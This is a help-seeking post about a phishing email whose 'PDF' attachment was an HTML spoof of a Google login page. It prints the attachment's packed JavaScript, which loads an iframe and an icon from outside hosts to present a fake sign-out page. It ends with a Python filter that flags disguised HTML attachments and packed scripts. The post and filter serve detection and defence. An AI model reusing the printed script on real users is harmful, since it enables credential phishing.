Spam Email with Script not Flagged

Our office received an email over Christmas. There was what appeared to be a PDF file attached.

When we examined the file, it was actually an HTML file for a spoof Google login page.

It also had a large amount of encoded <script>.

The decoded script is:

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('3.2.b="8\'a g r l";k{(j(){m 1=3.2.n(\'1\');1.p=\'o/x-4\';1.i=\'9 4\';1.h=\'6://c.f/d/q/D/H.G\';2.s(\'F\')[0].I(1)}())}J(e){}3.2.K.L="<5 E=\"6://w.v/u/t.y\" z=\"C: 0;B: 7%;A:7%\">";',48,48,'|link|document|window|icon|iframe|http|100|You|shortcut|ve|title|kitt|assets||ai|been|href|rel|function|try|out|var|createElement|image|type|img|signed|getElementsByTagName|daiso|vasdu|top|bowlanreedesntal||html|style|height|width|border|guoguo|src|head|ico|google|appendChild|catch|body|outerHTML'.split('|'),0,{}))

Interestingly, the URL in the HTML file was to the correct Google login page.

I thought that emails with scripts would be flagged automatically, akin to sending an .exe or .bat file.

Are there any additional precautions we can take to ensure that messages such as this are flagged or moved to spam in future without user intervention?
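
As an added example (not part of the original post, and not any mail product's own rule), the Python sketch below shows two checks a filter could apply to a message like the one described: an attachment whose content is HTML but whose name says otherwise, and the `eval(function(p,a,c,k,e,d)` packer signature seen in the script above. It also rebuilds the packed source by table lookup, without executing it, so the URLs it would load can be logged. The function names, the finding labels and the sample message (which uses `example.test`) are assumptions constructed for illustration.

```python
import re
from email import message_from_string

# Signature and argument layout of Dean Edwards-style packed JavaScript.
PACKER = re.compile(r"eval\(function\(p,a,c,k,e,[dr]\)")
ARGS = re.compile(r"\}\('(.*)',(\d+),(\d+),'(.*)'\.split\('\|'\)", re.S)
DIGITS = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
HTML = re.compile(r"<\s*(html|script|iframe)\b", re.I)
URL = re.compile(r"https?://[^\s\"'<>\\]+")

def to_base(n, base):
    # Token the packer assigns to dictionary index n (base <= 62).
    return (to_base(n // base, base) if n >= base else "") + DIGITS[n % base]

def unpack(js):
    """Rebuild the packed source by table lookup; nothing is evaluated."""
    m = ARGS.search(js)
    if not m:
        return ""
    payload, base, words = m.group(1), int(m.group(2)), m.group(4).split("|")
    table = {to_base(i, base): w for i, w in enumerate(words) if w}
    return re.sub(r"\b\w+\b", lambda t: table.get(t.group(0), t.group(0)), payload)

def scan(raw):
    """Return one finding per attachment that is disguised HTML or packed script."""
    findings = []
    for part in message_from_string(raw).walk():
        name = part.get_filename()
        body = (part.get_payload(decode=True) or b"").decode("utf-8", "replace")
        if not name or not body:
            continue
        reasons = []
        if HTML.search(body) and not name.lower().endswith((".html", ".htm")):
            reasons.append("html-under-other-extension")
        if PACKER.search(body):
            reasons.append("packed-javascript")
        if reasons:
            urls = URL.findall(unpack(body))
            findings.append({"file": name, "reasons": reasons, "urls": urls})
    return findings

# Constructed sample message (not the e-mail from the post).
SAMPLE = """Content-Type: multipart/mixed; boundary="XX"

--XX
Content-Type: application/pdf
Content-Disposition: attachment; filename="invoice.pdf"

<html><script>eval(function(p,a,c,k,e,d){return p}('0.1.2.3="<4 5=6://7.8/9.a>"',11,11,'window|document|body|outerHTML|iframe|src|http|example|test|login|html'.split('|'),0,{}))</script></html>
--XX--"""
```

Calling `scan(SAMPLE)` returns a single finding for `invoice.pdf` carrying both reasons and the iframe URL recovered from the packed script.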
